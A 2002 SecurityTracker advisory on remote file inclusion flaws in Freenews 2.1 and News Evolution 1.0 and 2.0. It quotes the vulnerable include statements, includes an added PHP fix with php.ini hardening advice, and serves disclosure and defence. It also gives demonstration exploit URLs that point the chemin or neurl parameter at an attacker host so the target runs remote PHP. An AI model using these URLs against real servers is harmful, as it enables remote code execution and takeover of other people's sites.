SecurityTracker.com
Category:  Application (Forum/Board/Portal)  >  Freenews
Vendors:  Prologin.fr
Freenews Forum Software Include File Bug Lets Remote Users Execute Arbitrary Commands on the System
SecurityTracker Alert ID:  1005717
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Nov 26 2002
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 2.1
Description:  An include file vulnerability was reported in Freenews. A remote user can execute arbitrary commands on the server.

It is reported that the 'aff_news.php' module contains several include statements that allow a remote user to specify a remote location for the include file. The statements are shown below:

include ("$chemin/config.php");
include ("$chemin/options.inc.php");
include ("$chemin/freenews_functions.inc.php");

A remote user can write arbitrary PHP code and host it on a remote server. The remote user can then send the target server a specially crafted URL that names the remote PHP code as the file to include.

A demonstration exploit URL is provided:

http://[target]/aff_news.php?chemin=http://[attacker]
with
http://[attacker]/config.php
http://[attacker]/options.inc.php
http://[attacker]/freenews_functions.inc.php

Impact:  A remote user can execute arbitrary commands on the system.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.prologin.fr
Cause:  Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Underlying OS Comments:  PHP-based
Reported By:  "Frog Man" <leseulfrog@hotmail.com>
Message History:   None.
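
One way to close the hole at the top of aff_news.php, given as an added example that is not Freenews code or a vendor patch. It assumes a local page may legitimately set $chemin before including the script; FREENEWS_ROOT and freenews_base() are hypothetical names introduced here.

```php
<?php
// Added example, not Freenews code: guard for the top of aff_news.php.
// Assumption: a local page sets $chemin to the Freenews directory before
// including this file; FREENEWS_ROOT is a hypothetical constant for it.
define('FREENEWS_ROOT', dirname(__FILE__));

/**
 * Return the canonical local directory for $candidate, or false when it
 * is not FREENEWS_ROOT or a directory below it.
 */
function freenews_base($candidate)
{
    $root = realpath(FREENEWS_ROOT);
    // realpath() only resolves existing local paths: "http://host" has no
    // local match and yields false, and "../" sequences are collapsed.
    $dir = is_string($candidate) ? realpath($candidate) : false;
    if ($root === false || $dir === false || !is_dir($dir)) {
        return false;
    }
    // Compare with a trailing separator so "/srv/freenews-old" does not
    // pass as being inside "/srv/freenews".
    if (strpos($dir . DIRECTORY_SEPARATOR, $root . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $dir;
}

// With register_globals on, ?chemin=... fills $chemin when the script is
// requested directly. Refuse any request that carries the parameter.
foreach (array($_GET, $_POST, $_COOKIE) as $input) {
    if (array_key_exists('chemin', $input)) {
        header('HTTP/1.1 400 Bad Request');
        exit('chemin may not be supplied by the client');
    }
}

$base = freenews_base(isset($chemin) ? $chemin : FREENEWS_ROOT);
if ($base === false) {
    header('HTTP/1.1 500 Internal Server Error');
    exit('invalid Freenews path');
}

// Same three files as the original, now under a validated local directory.
foreach (array('config.php', 'options.inc.php', 'freenews_functions.inc.php') as $file) {
    include $base . DIRECTORY_SEPARATOR . $file;
}
```

Independently of the script change, `register_globals = Off` and `allow_url_fopen = Off` in php.ini remove the two preconditions server-wide; PHP 5.2 and later also have `allow_url_include`, which is off by default.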


 Source Message Contents

Date:  Tue, 26 Nov 2002 17:43:49 +0100
From:  "Frog Man" <leseulfrog@hotmail.com>
Subject:  FreeNews & News Evolution (PHP)

 


Information :
°°°°°°°°°°°°°°
Problem : Include files
a) -------------------
Product : Freenews
Version : 2.1
Website : http://www.prologin.fr
----------------------

b) -------------------
Product : News Evolution
Versions : 1.0, 2.0
Website : http://www.phpevolution.net
----------------------


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
a) freenews 2.1
aff_news.php :
-------------------------------------------------
include ("$chemin/config.php");
include ("$chemin/options.inc.php");
include ("$chemin/freenews_functions.inc.php");
-------------------------------------------------

...

b) News Evolution 1.0
aff_news.php :
-------------------------------------
include ("$chemin/config.php");
include ("$chemin/functions.inc.php");
include ("$chemin/options.inc.php");
-------------------------------------

moteur/moteur.php :
--------------------------------------------------
include ("$chemin/moteur/moteur_form.php");
include ("$chemin/moteur/moteur_tab_results.php");
--------------------------------------------------

export_news.php :
---------------------------------------
include ("$chemin/config.php");
include ("$chemin/functions.inc.php");
include ("$chemin/options.inc.php");
include("$chemin/exporthtm.inc.php");
---------------------------------------

...

c) News Evolution 2.0
backend.php :
---------------------------------------------------------
include_once("$neurl/admin/modules/rss/easyRSS.inc.php");
---------------------------------------------------------

screen.php :
---------------------------------------------------------
include_once("$neurl/admin/cfg/configsql.inc.php");
include_once("$neurl/admin/cfg/configscreen.inc.php");
include_once("$neurl/admin/cfg/configsite.inc.php");
include_once("$neurl/admin/cfg/configtache.inc.php");
include_once("$neurl/admin/$sitelang");
include_once("$neurl/admin/fonctions/fctscr.php");
include_once("$neurl/admin/fonctions/fctadmin.php");
include_once("$neurl/admin/fonctions/fctform.php");
include_once("$neurl/admin/modules/cache.php");
---------------------------------------------------------

admin/modules/comment.php :
---------------------------------------------------------
@include_once("$neurl/admin/cfg/configscreen.inc.php");
@include_once("$neurl/admin/cfg/configsite.inc.php");
@include_once("$neurl/admin/$sitelang");
---------------------------------------------------------

...


Exploits :
°°°°°°°°°°
a) freenews 2.1
http://[target]/aff_news.php?chemin=http://[attacker]
with
http://[attacker]/config.php
http://[attacker]/options.inc.php
http://[attacker]/freenews_functions.inc.php
...

b) News Evolution 1.0
http://[target]/aff_news.php?chemin=http://[attacker]/
with
http://[attacker]/config.php
http://[attacker]/functions.inc.php
http://[attacker]/options.inc.php
...

c) News Evolution 2.0
http://[target]/screen.php?neurl=http://[attacker]
with :
http://[attacker]/admin/cfg/configsql.inc.php
http://[attacker]/admin/cfg/configscreen.inc.php
http://[attacker]/admin/cfg/configsite.inc.php
http://[attacker]/admin/cfg/configtache.inc.php
http://[attacker]/admin/fonctions/fctscr.php
http://[attacker]/admin/fonctions/fctadmin.php
http://[attacker]/admin/fonctions/fctform.php
http://[attacker]/admin/modules/cache.php


...

Patch :
°°°°°°°
http://www.phpsecure.org

More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/NEfree.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FNEfree.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n



Copyright 2002, SecurityGlobal.net LLC